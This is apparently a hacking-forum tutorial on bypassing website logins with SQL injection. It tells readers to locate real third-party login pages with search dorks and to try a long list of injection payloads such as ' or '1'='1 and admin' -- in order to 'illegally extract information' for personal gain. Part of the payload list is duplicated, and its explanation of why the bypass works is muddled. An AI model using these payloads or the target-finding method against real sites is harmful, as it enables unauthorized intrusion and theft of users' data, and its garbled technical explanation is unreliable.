Basic SQL injection with Login Queries

asically, it’s a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website’s database.
There are many type of certain queries that can be executed in order to illegally extract information from the website’s database.
In this tutorial the query we’ll be using is Basic SQL injection query where it can be executed in a login page.
Example:

Code:
Username: admin
Password: ‘ or ‘1’=’1

When you enter the password “‘or ‘1’=’1” in most website, there’s a chance you can gain access.
How does it happen? Look at the code when we execute that query

PHP Code:
SELECT * FROM users
WHERE username = ‘admin’AND password = ‘ ‘ or ‘1’=’1’ 

In the password field, we inserted a quote ‘ first, then a bunch of random characters like “1”.
The database always scans for rows and hence in the query we have executed, there’s only 1 row which states that there’s no reason for the login to be incorrect.
However, some websites can filter out these type of queries, so it’s best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we


Step1: Finding websites with Login Pages
Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
If you don’t know how to use dorks or have no idea about it, please visit my previous tutorial: http://www.hackforums.net/showthread.php?tid=2059771
In this tutorial, we can use these dorks:

Code:
inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html

If you want to find more dorks when using this method, you can find them here:

Code:
http://pastebin.com/ZjxpivV3

Step2: Now Executing the query
Alright, now that you’ve found your target with a log in page, lets play with it a bit.
So here’s what you’re gonna do
Username will be admin, cause most sites are having admin data stored in their databases

Code:
Username: admin
Password: ' or 0=0 --

Didn’t work? No worries, there’s more to that than just a single query
Here’s a list of queried passwords you can use to hopefully inject the site.

Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

Leave a comment